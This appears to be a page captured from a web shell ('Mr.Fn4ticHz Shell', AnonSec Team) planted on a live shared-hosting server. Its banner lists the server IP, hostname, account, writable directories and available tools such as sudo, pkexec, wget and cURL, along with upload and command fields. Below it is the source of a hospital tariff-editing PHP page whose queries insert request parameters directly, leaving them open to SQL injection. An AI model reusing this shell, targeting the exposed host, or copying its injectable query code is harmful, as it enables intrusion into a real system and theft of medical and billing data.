Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.138.121.151
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//edit_tarifrate.php
  	<?php session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
include 'header.php';

include("dbconnection.php");
?>
     <?php
    include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
		$sql2 ="SELECT * FROM site_users WHERE entered_by='$re[entered_by]' AND usertype='Hospital'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    if(Hospital==$re1[usertype])
{
?>
	  <?php
	include 'workdeskmenu.php';
		?>
          <?php
}
}
		}
	?>
            <?php
    include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
		$sql2 ="SELECT * FROM site_users WHERE entered_by='$re[entered_by]' AND usertype='LABORATORY'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    if(LABORATORY==$re1[usertype])
{
?>

	  <?php
	include 'patient_menu.php';
		?>
          <?php
}
}
		}
	?>
		    
	

	
<?php session_start();
   include("../dbconnection.php");
if(isset($_POST['signup'])) 
{ 
    
    	for ($i = 0; $i < count($_POST['wardid']); $i++) {
    $rate = $_POST['rate'][$i];
    $wardid = $_POST['wardid'][$i];
    	$updated_at=date("F d, Y / h:i:s A");
    	$tarifid=$_GET['tarifid'];
$sql ="UPDATE tarifrate SET rate='$rate' WHERE wardid='$wardid' AND tarifid='$tarifid'";

$qsql = mysqli_query($con,$sql);
    	}	
	if($qsql==1){	    
    echo "<script>alert('Update successfully');</script><script>window.history.go(-2)</script>;</script>";
   
    	}  		
 
    	
   
  
}

?>


  	

      <style>
       .center {
   border: 1px solid grey;
   text-align:;
}
    .center2 {
   border: 5px solid grey;
   text-align:;
}
</style>

 <link rel="stylesheet" href="assets/style.css">
<div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
          <div class='center'>
              <?php
              include("dbconnection.php");
         $sql ="SELECT * FROM tarif WHERE tarifid='$_GET[tarifid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo"<center><h2 class='code' style='text-align: center;'>$rs[tarifname]</h2></center>";
		}
		?>
        <form name='signup' method="POST">
        
	<table id='example2' class='table table-bordered table-hover'>
					     <tr>
					 <th>Ward Name </th>
					 <th>Rate  </th>
					 	 	 </tr>	 
					 	 	 	 <?php
					 	 	 	 session_start();
				include("dbconnection.php");
				
				require_once('../DBManager.php');
require_once('../LoginManager.php');
date_default_timezone_set('Asia/Kolkata');
   $created_at=date("F d, Y / h:i:s A");
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
	$sql1 ="SELECT * FROM site_users WHERE userno='$usertype'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re = mysqli_fetch_array($qsql1))
		{
					$sql ="SELECT * FROM tarif WHERE tarifid='$_GET[tarifid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		  	$sql ="SELECT * FROM ward WHERE  adminid='$re[entered_by]'";
		$qsql = mysqli_query($con,$sql);
		while($rspi = mysqli_fetch_array($qsql))
		{
		     	$sql12 ="SELECT * FROM tarifrate WHERE  tarifid='$rs[tarifid]' AND wardid='$rspi[wardid]'";
		$qsql12 = mysqli_query($con,$sql12);
		while($rspi12 = mysqli_fetch_array($qsql12))
		{
		    
		    $wrd=$rspi['ward_department'];
		     if($wrd == '1'){
		         echo"<tr> <td>Incentive Unit";
		     }
		    else if($wrd == '2'){
		         echo"<tr> <td>Ward";
		     }
		     else
		     {
		         echo"<tr><td>Operative room";
		     }
		     echo"$rspi[ward_type]-$rspi[ward_name]</td>";
		   
			echo"<td>
          	<input type='number' name='rate[]' size='2' value='$rspi12[rate]'>
          	<input type='hidden' name='wardid[]' size='2' value='$rspi12[wardid]'>
          	";
          	echo" 
			   
			    
			     </td>
			      </tr>";
		}
		}
		}
}
		?>
			
	</table>
	  <input type="submit"  name='signup' value="Update" class="btn btn-info"> 
      </form>
      

</div>

Anon7 - 2022
AnonSec Team